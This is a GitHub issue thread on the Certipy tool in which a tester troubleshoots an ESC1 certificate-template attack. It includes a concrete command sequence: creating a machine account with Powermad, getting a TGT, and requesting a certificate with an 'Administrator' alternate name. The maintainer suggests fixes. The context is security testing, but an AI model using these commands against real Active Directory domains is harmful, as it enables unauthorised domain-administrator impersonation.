ly4k / Certipy

Tool for Active Directory Certificate Services enumeration and abuse
MIT License

Another command syntax question re "ESC1 - SAN impersonation" attack #20

Closed 7MinSec closed 2 years ago

7MinSec commented 2 years ago

Hi again,

I raised this issue and it was determined the certificate service was not running on my CA.

On a second CA in the same environment, Certipy identified it as being vulnerable to the ESC1 - SAN impersonation attack. Specifically, Domain Computers can enroll. I used Powermad to create a "ghost" computer object. Then I used GetTGT from Impacket and issued export KRB5CCNAME=ghost-machine.cache. I also verified with rpcdump that certsrv.exe is running.

Now, what I'm trying to run with Certipy is as follows:

certipy 'domain.com/GHOST-MACHINE@ip.address.of.CA' -debug -dc-ip IP.OF.DOMAIN.CONTROLLER -k -no-pass req -template 'TEMPLATE' -ca 'CA-NAME-AND-*NOT*-THE-DNS-NAME' -altname 'Administrator'

When I do, I basically get the same output as issue 19 with a long traceback that ends in:

impacket.smbconnection.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

Again, the difference this time around is that I believe the certificate services are running, so I'm not sure why my attempts are not successful. Could you please help?

Thanks, Brian

ly4k commented 2 years ago

Hello Brian

To use Kerberos authentication, you have to specify the FQDN of the CA in the target, and not the IP. You can specify the IP in the -target-ip parameter if DNS is an issue. Also, you don't have to use Kerberos, you can just specify the hash or password. Can you please provide the debug output for more troubleshooting?

Best regards, Oliver

7MinSec commented 2 years ago

Thanks! OK so I changed the request to have the FQDN of the CA as the target. Specifically:

certipy 'FQDN.OF.THE.CA' -debug -dc-ip IP.OF.DOMAIN.CONTROLLER -k -no-pass req -template 'TEMPLATE' -ca 'CA-NAME-AND-*NOT*-THE-DNS-NAME' -altname 'Administrator'

My debug says:

Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/impacket/smbconnection.py", line 556, in openFile
    return self._SMBConnection.create(treeId, pathName, desiredAccess, shareMode, creationOption,
  File "/usr/local/lib/python3.9/dist-packages/impacket/smb3.py", line 1227, in create
    if ans.isValidAnswer(STATUS_SUCCESS):
  File "/usr/local/lib/python3.9/dist-packages/impacket/smb3structs.py", line 458, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/bin/certipy", line 33, in <module>
    sys.exit(load_entry_point('Certipy==0.2', 'console_scripts', 'certipy')())
  File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/entry.py", line 172, in main
  File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/request.py", line 319, in request
  File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/request.py", line 232, in run
  File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/request.py", line 225, in connect
  File "/usr/local/lib/python3.9/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 803, in connect
    return self._transport.connect()
  File "/usr/local/lib/python3.9/dist-packages/impacket/dcerpc/v5/transport.py", line 518, in connect
    self.__handle = self.__smb_connection.openFile(self.__tid, self.__filename)
  File "/usr/local/lib/python3.9/dist-packages/impacket/smbconnection.py", line 560, in openFile
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

Thanks, Brian

ly4k commented 2 years ago

Hello Brian. It seems really weird. Almost as if the named pipe is missing. Can you provide me with the certsrv.exe entry from rpcdump?

ly4k commented 2 years ago

A new version of Certipy has been released. Please try with the new -dynamic-endpoint parameter.